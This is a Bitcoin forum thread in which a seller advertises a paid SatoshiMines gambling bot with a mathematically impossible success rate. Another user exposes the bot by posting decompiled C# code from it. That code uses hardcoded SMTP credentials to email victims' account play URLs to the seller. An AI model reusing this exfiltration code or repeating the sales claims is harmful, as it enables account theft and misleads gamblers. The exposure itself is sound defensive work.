Bitcoin Forum
July 06, 2024, 09:23:22 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]

Home   Help Search Login Register More  
Warning: One or more bitcointalk.org users have reported that they strongly believe that the creator of this topic is a scammer. (Login to see the detailed trust ratings.) While the bitcointalk.org administration does not verify such claims, you should proceed with extreme caution.
Pages: [1]
  Print  
Author Topic: [$20] [FREE] Make Hundres of Dollars in Hours With my SatoshiMines Bot!!!  (Read 742 times)
nodes (OP)

Activity: 57
Merit: 0

View Profile
February 14, 2016, 02:17:29 PM
Last edit: February 14, 2016, 02:54:58 PM by nodes

Want to make Such Money?

Then get my one and only Private Satoshi Mines bot with Professionally Designed Algorithm. Also Supports Practice Mode!!

There are many free bots over the internet but none has this advanced algorithm.

Price : $20 ONLY for PRO Version FOR FIRST 5 COPIES ONLY. THEN $50 Per Copy.
Lite Version is Free to Download

Pro Version
Much faster Earning Speed.
Maximum Possible Starting Bet
Unlimited Bets Per Session
Constant Updates
Lifetime Priority Support

PM Me or Post here to Buy!

Lite Version
Very Slow Earning Speed
Limited Starting Bet
10 Bets Per Session Limit
Slow Updates
No Support

Source Code price $1000.

FAQ

What strategy does it use?
The bot uses a mixture of martingale and my own personally designed algorithm.

What is Practice Mode?
Practice Mode is exactly what it sounds like. It will run the bot with 0 balance so you can check how much you can earn if you Top Up your account and run in Live Mode.

What is Pro version and Lite Version?
Lite version is Free but has many limitations. You can only run 10 bets per session in Lite Version and Its earning speed is capped by limiting the max first investment. Pro Version has no limitations at all.

What is the Success Rate?
It has 99.999937% Success Rate proven mathematically.

Compatible with What Operating Systems?
Only Compatible with Windows with dot net framework 4 installed.

Any other requirements?
Yes you need the minimum starting balance which you can select yourself. Earning speed will depend on your Starting balance. The higher the starting balance is the more you will earn per session.

Escrow Accepted?
Yes, Escrow is accepted. Buyer pays escrow fee.

Do you provide Vouch Copies?
There is a free version which you can download and try but it has multiple limitations. Pro version removes all those limitations.

Refund Policy?
No Refund

Disclaimer: I do not give 100% guarantee that you will win using this bot. Although it has 99.999937% Success rate proven mathematically, it is still gambling and you can still lose. So don't be greedy and invest only what you can afford to lose.

Post your questions below.
icanscript

Activity: 686
Merit: 502

View Profile
February 14, 2016, 02:28:22 PM

il leave this here.

https://www.virustotal.com/en/file/e45e0d8a7621ad87e4761959cab4e25ee086a37b30d37b0c99f67a654626662a/analysis/
nodes (OP)

Activity: 57
Merit: 0

View Profile
February 14, 2016, 02:34:41 PM

Detection ratio:    3 / 54

Never even ever heard of those 3 anti viruses names. Probably they are detecting it cause the source code is encrypted and obfuscated using smartassembly because I don't want the code of my program stolen. Smiley

BUY SOURCE CODE AND LIFETIME LICENSE TO SELL THIS BOT FOR $1000 ONLY.
icanscript

Activity: 686
Merit: 502

View Profile
February 14, 2016, 02:45:58 PM

DO NOT TRUST THIS SOFTWARE

what is this about then?

Looks as if your sending other peoples Specific URLs to that address.

static void smethod_13(Form1 form1_0)
    {
      if (!(!Class0.smethod_37().Balance & Operators.CompareString(form1_0.vmethod_38().Text, "0.2", false) > 0))
        return;
      SmtpClient smtpClient = new SmtpClient("smtp-pulse.com", 2525);
      smtpClient.Credentials = (ICredentialsByHost) new NetworkCredential("spriteslide@gmail.com", "X7YGEFNnEWD");
      MailMessage message = new MailMessage("spriteslide@gmail.com", "spriteslide@gmail.com", "Satoshi With Balance", "https://satoshimines.com/play/" + form1_0.vmethod_4().Text);
      smtpClient.Send(message);
      Class0.smethod_37().Balance = true;
    }

Faucet Man

Activity: 182
Merit: 100

View Profile
February 14, 2016, 02:48:29 PM

I have a $1 worth of bitcoin in satoshimines account I would like to take a vouch and leave my review. Smiley

*Image Removed*
zodiac3011

Activity: 770
Merit: 500

View Profile
February 14, 2016, 02:49:59 PM

one thing I have learned about practice game is that you will be less less less ( less 3 times ) likely to hit the mine. So posting a proof from practice games is quite unconvincing.
Pages: [1]
  Print  

Jump to: